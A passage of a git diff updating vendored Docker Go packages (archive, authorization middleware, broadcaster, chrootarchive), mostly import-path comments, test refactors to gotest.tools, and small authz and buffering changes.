"archive/tar" diff --git a/vendor/github.com/docker/docker/pkg/archive/whiteouts.go b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go index d20478a10d..4c072a87ee 100644 --- a/vendor/github.com/docker/docker/pkg/archive/whiteouts.go +++ b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" // Whiteouts are files with a special meaning for the layered filesystem. // Docker uses AUFS whiteout files inside exported archives. In other diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap.go b/vendor/github.com/docker/docker/pkg/archive/wrap.go index b39d12c878..85435694cf 100644 --- a/vendor/github.com/docker/docker/pkg/archive/wrap.go +++ b/vendor/github.com/docker/docker/pkg/archive/wrap.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap_test.go b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go index 46ab36697a..1faa7aed75 100644 --- a/vendor/github.com/docker/docker/pkg/archive/wrap_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go @@ -1,17 +1,17 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" "bytes" "io" "testing" + + "gotest.tools/assert" ) func TestGenerateEmptyFile(t *testing.T) { archive, err := Generate("emptyFile") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if archive == nil { t.Fatal("The generated archive should not be nil.") } @@ -28,9 +28,7 @@ func TestGenerateEmptyFile(t *testing.T) { if err == io.EOF { break } - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) buf := new(bytes.Buffer) buf.ReadFrom(tr) content := buf.String() @@ -54,9 +52,7 @@ func TestGenerateEmptyFile(t *testing.T) { func TestGenerateWithContent(t *testing.T) { archive, err := Generate("file", "content") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if archive == nil { t.Fatal("The generated archive should not be nil.") } @@ -73,9 +69,7 @@ func TestGenerateWithContent(t *testing.T) { if err == io.EOF { break } - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) buf := new(bytes.Buffer) buf.ReadFrom(tr) content := buf.String() diff --git a/vendor/github.com/docker/docker/pkg/authorization/api.go b/vendor/github.com/docker/docker/pkg/authorization/api.go index 05c75f1a67..cc0c12d502 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/api.go +++ b/vendor/github.com/docker/docker/pkg/authorization/api.go @@ -1,4 +1,4 @@ -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "crypto/x509" @@ -18,7 +18,7 @@ const ( ) // PeerCertificate is a wrapper around x509.Certificate which provides a sane -// enconding/decoding to/from PEM format and JSON. +// encoding/decoding to/from PEM format and JSON. type PeerCertificate x509.Certificate // MarshalJSON returns the JSON encoded pem bytes of a PeerCertificate. diff --git a/vendor/github.com/docker/docker/pkg/authorization/api_test.go b/vendor/github.com/docker/docker/pkg/authorization/api_test.go new file mode 100644 index 0000000000..ff364fd0bc --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/api_test.go @@ -0,0 +1,76 @@ +package authorization // import "github.com/docker/docker/pkg/authorization" + +import ( + "crypto/rand" + "crypto/rsa" + "crypto/tls" + "crypto/x509" + "crypto/x509/pkix" + "math/big" + "net/http" + "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestPeerCertificateMarshalJSON(t *testing.T) { + template := &x509.Certificate{ + IsCA: true, + BasicConstraintsValid: true, + SubjectKeyId: []byte{1, 2, 3}, + SerialNumber: big.NewInt(1234), + Subject: pkix.Name{ + Country: []string{"Earth"}, + Organization: []string{"Mother Nature"}, + }, + NotBefore: time.Now(), + NotAfter: time.Now().AddDate(5, 5, 5), + + ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth, x509.ExtKeyUsageServerAuth}, + KeyUsage: x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign, + } + // generate private key + privatekey, err := rsa.GenerateKey(rand.Reader, 2048) + assert.NilError(t, err) + publickey := &privatekey.PublicKey + + // create a self-signed certificate. template = parent + var parent = template + raw, err := x509.CreateCertificate(rand.Reader, template, parent, publickey, privatekey) + assert.NilError(t, err) + + cert, err := x509.ParseCertificate(raw) + assert.NilError(t, err) + + var certs = []*x509.Certificate{cert} + addr := "www.authz.com/auth" + req, err := http.NewRequest("GET", addr, nil) + assert.NilError(t, err) + + req.RequestURI = addr + req.TLS = &tls.ConnectionState{} + req.TLS.PeerCertificates = certs + req.Header.Add("header", "value") + + for _, c := range req.TLS.PeerCertificates { + pcObj := PeerCertificate(*c) + + t.Run("Marshalling :", func(t *testing.T) { + raw, err = pcObj.MarshalJSON() + assert.Assert(t, raw != nil) + assert.NilError(t, err) + }) + + t.Run("UnMarshalling :", func(t *testing.T) { + err := pcObj.UnmarshalJSON(raw) + assert.Assert(t, is.Nil(err)) + assert.Equal(t, "Earth", pcObj.Subject.Country[0]) + assert.Equal(t, true, pcObj.IsCA) + + }) + + } + +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz.go b/vendor/github.com/docker/docker/pkg/authorization/authz.go index dc9a9ae56f..a1edbcd89d 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/authz.go +++ b/vendor/github.com/docker/docker/pkg/authorization/authz.go @@ -1,15 +1,16 @@ -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "bufio" "bytes" "fmt" "io" + "mime" "net/http" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/ioutils" + "github.com/sirupsen/logrus" ) const maxBodySize = 1048576 // 1MB @@ -153,12 +154,17 @@ func sendBody(url string, header http.Header) bool { } // body is sent only for text or json messages - return header.Get("Content-Type") == "application/json" + contentType, _, err := mime.ParseMediaType(header.Get("Content-Type")) + if err != nil { + return false + } + + return contentType == "application/json" } // headers returns flatten version of the http headers excluding authorization func headers(header http.Header) map[string]string { - v := make(map[string]string, 0) + v := make(map[string]string) for k, values := range header { // Skip authorization headers if strings.EqualFold(k, "Authorization") || strings.EqualFold(k, "X-Registry-Config") || strings.EqualFold(k, "X-Registry-Auth") { @@ -176,10 +182,7 @@ type authorizationError struct { error } -// HTTPErrorStatusCode returns the authorization error status code (forbidden) -func (e authorizationError) HTTPErrorStatusCode() int { - return http.StatusForbidden -} +func (authorizationError) Forbidden() {} func newAuthorizationError(plugin, msg string) authorizationError { return authorizationError{error: fmt.Errorf("authorization denied by plugin %s: %s", plugin, msg)} diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go index a787f3cd8c..cfdb9a0039 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go @@ -3,7 +3,7 @@ // TODO Windows: This uses a Unix socket for testing. This might be possible // to port to Windows using a named pipe instead. -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "bytes" @@ -99,7 +99,7 @@ func TestAuthZResponsePlugin(t *testing.T) { request := Request{ User: "user", - RequestURI: "someting.com/auth", + RequestURI: "something.com/auth", RequestBody: []byte("sample body"), } server.replayResponse = Response{ @@ -172,6 +172,66 @@ func TestDrainBody(t *testing.T) { } } +func TestSendBody(t *testing.T) { + var ( + url = "nothing.com" + testcases = []struct { + contentType string + expected bool + }{ + { + contentType: "application/json", + expected: true, + }, + { + contentType: "Application/json", + expected: true, + }, + { + contentType: "application/JSON", + expected: true, + }, + { + contentType: "APPLICATION/JSON", + expected: true, + }, + { + contentType: "application/json; charset=utf-8", + expected: true, + }, + { + contentType: "application/json;charset=utf-8", + expected: true, + }, + { + contentType: "application/json; charset=UTF8", + expected: true, + }, + { + contentType: "application/json;charset=UTF8", + expected: true, + }, + { + contentType: "text/html", + expected: false, + }, + { + contentType: "", + expected: false, + }, + } + ) + + for _, testcase := range testcases { + header := http.Header{} + header.Set("Content-Type", testcase.contentType) + + if b := sendBody(url, header); b != testcase.expected { + t.Fatalf("Unexpected Content-Type; Expected: %t, Actual: %t", testcase.expected, b) + } + } +} + func TestResponseModifierOverride(t *testing.T) { r := httptest.NewRecorder() m := NewResponseModifier(r) diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware.go b/vendor/github.com/docker/docker/pkg/authorization/middleware.go index 52890dd360..39c2dce856 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/middleware.go +++ b/vendor/github.com/docker/docker/pkg/authorization/middleware.go @@ -1,12 +1,12 @@ -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( + "context" "net/http" "sync" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/plugingetter" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) // Middleware uses a list of plugins to @@ -25,6 +25,12 @@ func NewMiddleware(names []string, pg plugingetter.PluginGetter) *Middleware { } } +func (m *Middleware) getAuthzPlugins() []Plugin { + m.mu.Lock() + defer m.mu.Unlock() + return m.plugins +} + // SetPlugins sets the plugin used for authorization func (m *Middleware) SetPlugins(names []string) { m.mu.Lock() @@ -32,13 +38,23 @@ func (m *Middleware) SetPlugins(names []string) { m.mu.Unlock() } +// RemovePlugin removes a single plugin from this authz middleware chain +func (m *Middleware) RemovePlugin(name string) { + m.mu.Lock() + defer m.mu.Unlock() + plugins := m.plugins[:0] + for _, authPlugin := range m.plugins { + if authPlugin.Name() != name { + plugins = append(plugins, authPlugin) + } + } + m.plugins = plugins +} + // WrapHandler returns a new handler function wrapping the previous one in the request chain. func (m *Middleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { - - m.mu.Lock() - plugins := m.plugins - m.mu.Unlock() + plugins := m.getAuthzPlugins() if len(plugins) == 0 { return handler(ctx, w, r, vars) } @@ -70,6 +86,16 @@ func (m *Middleware) WrapHandler(handler func(ctx context.Context, w http.Respon logrus.Errorf("Handler for %s %s returned error: %s", r.Method, r.RequestURI, errD) } + // There's a chance that the authCtx.plugins was updated. One of the reasons + // this can happen is when an authzplugin is disabled. + plugins = m.getAuthzPlugins() + if len(plugins) == 0 { + logrus.Debug("There are no authz plugins in the chain") + return nil + } + + authCtx.plugins = plugins + if err := authCtx.AuthZResponse(rw, r); errD == nil && err != nil { logrus.Errorf("AuthZResponse for %s %s returned error: %s", r.Method, r.RequestURI, err) return err diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware_test.go b/vendor/github.com/docker/docker/pkg/authorization/middleware_test.go new file mode 100644 index 0000000000..6afafe082d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/middleware_test.go @@ -0,0 +1,53 @@ +package authorization // import "github.com/docker/docker/pkg/authorization" + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" + + "github.com/docker/docker/pkg/plugingetter" + "gotest.tools/assert" +) + +func TestMiddleware(t *testing.T) { + pluginNames := []string{"testPlugin1", "testPlugin2"} + var pluginGetter plugingetter.PluginGetter + m := NewMiddleware(pluginNames, pluginGetter) + authPlugins := m.getAuthzPlugins() + assert.Equal(t, 2, len(authPlugins)) + assert.Equal(t, pluginNames[0], authPlugins[0].Name()) + assert.Equal(t, pluginNames[1], authPlugins[1].Name()) +} + +func TestNewResponseModifier(t *testing.T) { + recorder := httptest.NewRecorder() + modifier := NewResponseModifier(recorder) + modifier.Header().Set("H1", "V1") + modifier.Write([]byte("body")) + assert.Assert(t, !modifier.Hijacked()) + modifier.WriteHeader(http.StatusInternalServerError) + assert.Assert(t, modifier.RawBody() != nil) + + raw, err := modifier.RawHeaders() + assert.Assert(t, raw != nil) + assert.NilError(t, err) + + headerData := strings.Split(strings.TrimSpace(string(raw)), ":") + assert.Equal(t, "H1", strings.TrimSpace(headerData[0])) + assert.Equal(t, "V1", strings.TrimSpace(headerData[1])) + + modifier.Flush() + modifier.FlushAll() + + if recorder.Header().Get("H1") != "V1" { + t.Fatalf("Header value must exists %s", recorder.Header().Get("H1")) + } + +} + +func setAuthzPlugins(m *Middleware, plugins []Plugin) { + m.mu.Lock() + m.plugins = plugins + m.mu.Unlock() +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go b/vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go new file mode 100644 index 0000000000..450e7fbbb7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go @@ -0,0 +1,66 @@ +// +build !windows + +package authorization // import "github.com/docker/docker/pkg/authorization" + +import ( + "context" + "net/http" + "net/http/httptest" + "testing" + + "github.com/docker/docker/pkg/plugingetter" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestMiddlewareWrapHandler(t *testing.T) { + server := authZPluginTestServer{t: t} + server.start() + defer server.stop() + + authZPlugin := createTestPlugin(t) + pluginNames := []string{authZPlugin.name} + + var pluginGetter plugingetter.PluginGetter + middleWare := NewMiddleware(pluginNames, pluginGetter) + handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return nil + } + + authList := []Plugin{authZPlugin} + middleWare.SetPlugins([]string{"My Test Plugin"}) + setAuthzPlugins(middleWare, authList) + mdHandler := middleWare.WrapHandler(handler) + assert.Assert(t, mdHandler != nil) + + addr := "www.example.com/auth" + req, _ := http.NewRequest("GET", addr, nil) + req.RequestURI = addr + req.Header.Add("header", "value") + + resp := httptest.NewRecorder() + ctx := context.Background() + + t.Run("Error Test Case :", func(t *testing.T) { + server.replayResponse = Response{ + Allow: false, + Msg: "Server Auth Not Allowed", + } + if err := mdHandler(ctx, resp, req, map[string]string{}); err == nil { + assert.Assert(t, is.ErrorContains(err, "")) + } + + }) + + t.Run("Positive Test Case :", func(t *testing.T) { + server.replayResponse = Response{ + Allow: true, + Msg: "Server Auth Allowed", + } + if err := mdHandler(ctx, resp, req, map[string]string{}); err != nil { + assert.NilError(t, err) + } + + }) + +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/plugin.go b/vendor/github.com/docker/docker/pkg/authorization/plugin.go index 4b1c71bd4b..3316fd870c 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/plugin.go +++ b/vendor/github.com/docker/docker/pkg/authorization/plugin.go @@ -1,4 +1,4 @@ -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "sync" @@ -48,9 +48,10 @@ func GetPluginGetter() plugingetter.PluginGetter { // authorizationPlugin is an internal adapter to docker plugin system type authorizationPlugin struct { - plugin *plugins.Client - name string - once sync.Once + initErr error + plugin *plugins.Client + name string + once sync.Once } func newAuthorizationPlugin(name string) Plugin { @@ -61,6 +62,11 @@ func (a *authorizationPlugin) Name() string { return a.name } +// Set the remote for an authz pluginv2 +func (a *authorizationPlugin) SetName(remote string) { + a.name = remote +} + func (a *authorizationPlugin) AuthZRequest(authReq *Request) (*Response, error) { if err := a.initPlugin(); err != nil { return nil, err @@ -90,23 +96,23 @@ func (a *authorizationPlugin) AuthZResponse(authReq *Request) (*Response, error) // initPlugin initializes the authorization plugin if needed func (a *authorizationPlugin) initPlugin() error { // Lazy loading of plugins - var err error a.once.Do(func() { if a.plugin == nil { var plugin plugingetter.CompatPlugin var e error if pg := GetPluginGetter(); pg != nil { - plugin, e = pg.Get(a.name, AuthZApiImplements, plugingetter.LOOKUP) + plugin, e = pg.Get(a.name, AuthZApiImplements, plugingetter.Lookup) + a.SetName(plugin.Name()) } else { plugin, e = plugins.Get(a.name, AuthZApiImplements) } if e != nil { - err = e + a.initErr = e return } a.plugin = plugin.Client() } }) - return err + return a.initErr } diff --git a/vendor/github.com/docker/docker/pkg/authorization/response.go b/vendor/github.com/docker/docker/pkg/authorization/response.go index 129bf2f417..6b674bc295 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/response.go +++ b/vendor/github.com/docker/docker/pkg/authorization/response.go @@ -1,4 +1,4 @@ -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "bufio" @@ -8,7 +8,7 @@ import ( "net" "net/http" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) // ResponseModifier allows authorization plugins to read and modify the content of the http.response @@ -47,6 +47,8 @@ func NewResponseModifier(rw http.ResponseWriter) ResponseModifier { return &responseModifier{rw: rw, header: make(http.Header)} } +const maxBufferSize = 64 * 1024 + // responseModifier is used as an adapter to http.ResponseWriter in order to manipulate and explore // the http request/response from docker daemon type responseModifier struct { @@ -116,11 +118,13 @@ func (rm *responseModifier) OverrideHeader(b []byte) error { // Write stores the byte array inside content func (rm *responseModifier) Write(b []byte) (int, error) { - if rm.hijacked { return rm.rw.Write(b) } + if len(rm.body)+len(b) > maxBufferSize { + rm.Flush() + } rm.body = append(rm.body, b...) return len(b), nil } @@ -192,11 +196,14 @@ func (rm *responseModifier) FlushAll() error { var err error if len(rm.body) > 0 { // Write body - _, err = rm.rw.Write(rm.body) + var n int + n, err = rm.rw.Write(rm.body) + // TODO(@cpuguy83): there is now a relatively small buffer limit, instead of discarding our buffer here and + // allocating again later this should just keep using the same buffer and track the buffer position (like a bytes.Buffer with a fixed size) + rm.body = rm.body[n:] } // Clean previous data - rm.body = nil rm.statusCode = 0 rm.header = http.Header{} return err diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go index 784d65d6fe..6bb285123f 100644 --- a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go +++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go @@ -1,4 +1,4 @@ -package broadcaster +package broadcaster // import "github.com/docker/docker/pkg/broadcaster" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go index 9f8e72bc0f..c510584aa3 100644 --- a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go +++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go @@ -1,10 +1,9 @@ -package broadcaster +package broadcaster // import "github.com/docker/docker/pkg/broadcaster" import ( "bytes" "errors" "strings" - "testing" ) diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go index a7814f5b90..47c9a2b94c 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "fmt" @@ -11,7 +11,16 @@ import ( "github.com/docker/docker/pkg/idtools" ) -var chrootArchiver = &archive.Archiver{Untar: Untar} +// NewArchiver returns a new Archiver which uses chrootarchive.Untar +func NewArchiver(idMappings *idtools.IDMappings) *archive.Archiver { + if idMappings == nil { + idMappings = &idtools.IDMappings{} + } + return &archive.Archiver{ + Untar: Untar, + IDMappingsVar: idMappings, + } +} // Untar reads a stream of bytes from `archive`, parses it as a tar archive, // and unpacks it into the directory at `dest`. @@ -30,7 +39,6 @@ func UntarUncompressed(tarArchive io.Reader, dest string, options *archive.TarOp // Handler for teasing out the automatic decompression func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions, decompress bool) error { - if tarArchive == nil { return fmt.Errorf("Empty archive") } @@ -41,14 +49,12 @@ func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions options.ExcludePatterns = []string{} } - rootUID, rootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) - if err != nil { - return err - } + idMappings := idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps) + rootIDs := idMappings.RootPair() dest = filepath.Clean(dest) if _, err := os.Stat(dest); os.IsNotExist(err) { - if err := idtools.MkdirAllNewAs(dest, 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChownNew(dest, 0755, rootIDs); err != nil { return err } } @@ -65,33 +71,3 @@ func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions return invokeUnpack(r, dest, options) } - -// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. -// If either Tar or Untar fails, TarUntar aborts and returns the error. -func TarUntar(src, dst string) error { - return chrootArchiver.TarUntar(src, dst) -} - -// CopyWithTar creates a tar archive of filesystem path `src`, and -// unpacks it at filesystem path `dst`. -// The archive is streamed directly with fixed buffering and no -// intermediary disk IO. -func CopyWithTar(src, dst string) error { - return chrootArchiver.CopyWithTar(src, dst) -} - -// CopyFileWithTar emulates the behavior of the 'cp' command-line -// for a single file. It copies a regular file from path `src` to -// path `dst`, and preserves all its metadata. -// -// If `dst` ends with a trailing slash '/' ('\' on Windows), the final -// destination path will be `dst/base(src)` or `dst\base(src)` -func CopyFileWithTar(src, dst string) (err error) { - return chrootArchiver.CopyFileWithTar(src, dst) -} - -// UntarPath is a convenience function which looks for an archive -// at filesystem path `src`, and unpacks it at `dst`. -func UntarPath(src, dst string) error { - return chrootArchiver.UntarPath(src, dst) -} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go index d2d7e621f5..5911a36158 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "bytes" @@ -16,20 +16,40 @@ import ( "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/reexec" "github.com/docker/docker/pkg/system" + "gotest.tools/skip" ) func init() { reexec.Init() } +var chrootArchiver = NewArchiver(nil) + +func TarUntar(src, dst string) error { + return chrootArchiver.TarUntar(src, dst) +} + +func CopyFileWithTar(src, dst string) (err error) { + return chrootArchiver.CopyFileWithTar(src, dst) +} + +func UntarPath(src, dst string) error { + return chrootArchiver.UntarPath(src, dst) +} + +func CopyWithTar(src, dst string) error { + return chrootArchiver.CopyWithTar(src, dst) +} + func TestChrootTarUntar(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntar") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil { @@ -43,7 +63,7 @@ func TestChrootTarUntar(t *testing.T) { t.Fatal(err) } dest := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } if err := Untar(stream, dest, &archive.TarOptions{ExcludePatterns: []string{"lolo"}}); err != nil { @@ -54,13 +74,14 @@ func TestChrootTarUntar(t *testing.T) { // gh#10426: Verify the fix for having a huge excludes list (like on `docker load` with large # of // local images) func TestChrootUntarWithHugeExcludesList(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarHugeExcludes") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil { @@ -71,13 +92,13 @@ func TestChrootUntarWithHugeExcludesList(t *testing.T) { t.Fatal(err) } dest := filepath.Join(tmpdir, "dest") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } options := &archive.TarOptions{} //65534 entries of 64-byte strings ~= 4MB of environment space which should overflow //on most systems when passed via environment or command line arguments - excludes := make([]string, 65534, 65534) + excludes := make([]string, 65534) for i := 0; i < 65534; i++ { excludes[i] = strings.Repeat(string(i), 64) } @@ -152,17 +173,15 @@ func compareFiles(src string, dest string) error { } func TestChrootTarUntarWithSymlink(t *testing.T) { - // TODO Windows: Figure out why this is failing - if runtime.GOOS == "windows" { - t.Skip("Failing on Windows") - } + skip.If(t, runtime.GOOS == "windows", "FIXME: figure out why this is failing") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntarWithSymlink") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if _, err := prepareSourceDirectory(10, src, false); err != nil { @@ -178,17 +197,15 @@ func TestChrootTarUntarWithSymlink(t *testing.T) { } func TestChrootCopyWithTar(t *testing.T) { - // TODO Windows: Figure out why this is failing - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { - t.Skip("Failing on Windows and Solaris") - } + skip.If(t, runtime.GOOS == "windows", "FIXME: figure out why this is failing") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyWithTar") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if _, err := prepareSourceDirectory(10, src, true); err != nil { @@ -228,13 +245,14 @@ func TestChrootCopyWithTar(t *testing.T) { } func TestChrootCopyFileWithTar(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyFileWithTar") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if _, err := prepareSourceDirectory(10, src, true); err != nil { @@ -271,17 +289,15 @@ func TestChrootCopyFileWithTar(t *testing.T) { } func TestChrootUntarPath(t *testing.T) { - // TODO Windows: Figure out why this is failing - if runtime.GOOS == "windows" { - t.Skip("Failing on Windows") - } + skip.If(t, runtime.GOOS == "windows", "FIXME: figure out why this is failing") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarPath") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if _, err := prepareSourceDirectory(10, src, false); err != nil { @@ -336,13 +352,14 @@ func (s *slowEmptyTarReader) Read(p []byte) (int, error) { } func TestChrootUntarEmptyArchiveFromSlowReader(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarEmptyArchiveFromSlowReader") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) dest := filepath.Join(tmpdir, "dest") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024} @@ -352,13 +369,14 @@ func TestChrootUntarEmptyArchiveFromSlowReader(t *testing.T) { } func TestChrootApplyEmptyArchiveFromSlowReader(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyEmptyArchiveFromSlowReader") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) dest := filepath.Join(tmpdir, "dest") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024} @@ -368,13 +386,14 @@ func TestChrootApplyEmptyArchiveFromSlowReader(t *testing.T) { } func TestChrootApplyDotDotFile(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyDotDotFile") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if err := ioutil.WriteFile(filepath.Join(src, "..gitme"), []byte(""), 0644); err != nil { @@ -385,7 +404,7 @@ func TestChrootApplyDotDotFile(t *testing.T) { t.Fatal(err) } dest := filepath.Join(tmpdir, "dest") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } if _, err := ApplyLayer(dest, stream); err != nil { diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go index f2325abd74..5df8afd662 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go @@ -1,6 +1,6 @@ // +build !windows -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "bytes" @@ -66,10 +66,12 @@ func invokeUnpack(decompressedArchive io.Reader, dest string, options *archive.T cmd.Stderr = output if err := cmd.Start(); err != nil { + w.Close() return fmt.Errorf("Untar error on re-exec cmd: %v", err) } //write the options to the pipe for the untar exec to read if err := 